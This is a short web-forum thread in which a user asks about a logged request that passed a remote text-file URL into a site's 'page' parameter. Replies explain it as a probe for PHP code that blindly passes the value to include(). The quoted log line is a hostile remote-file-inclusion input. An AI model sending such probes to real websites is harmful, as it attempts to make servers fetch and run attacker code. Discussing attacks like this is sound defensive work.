Attempt to spam?

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
ssand
Forum Commoner
Posts: 72
Joined: Sat Jun 22, 2002 9:25 pm
Location: Iowa

Attempt to spam?

Post by ssand »

Was looking through my brother-in-laws stat counter on his site and noticed a this in the log.

(http://www.his-site.com)/index.php?page=http://geocities.com/intermentur_b/send.txt

I presume they were attempting to run the page through my brother-in-laws site and spam under his domain and IP? It doesn't show anything on his site when called. Is this due to a built-in security measure of PHP or of the code on his site (my brother-in-laws site).

Thanks.

-
User avatar
superdezign
DevNet Master
Posts: 4135
Joined: Sat Jan 20, 2007 11:06 pm

Post by superdezign »

That wouldn't cause spam, and doesn't have anything to do with a built-in security measure. His code likely is at least semi-secure and knows what pages it accepts as valid.
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

The attempt is to see if the page uses include() to blindly load the reference.
Post Reply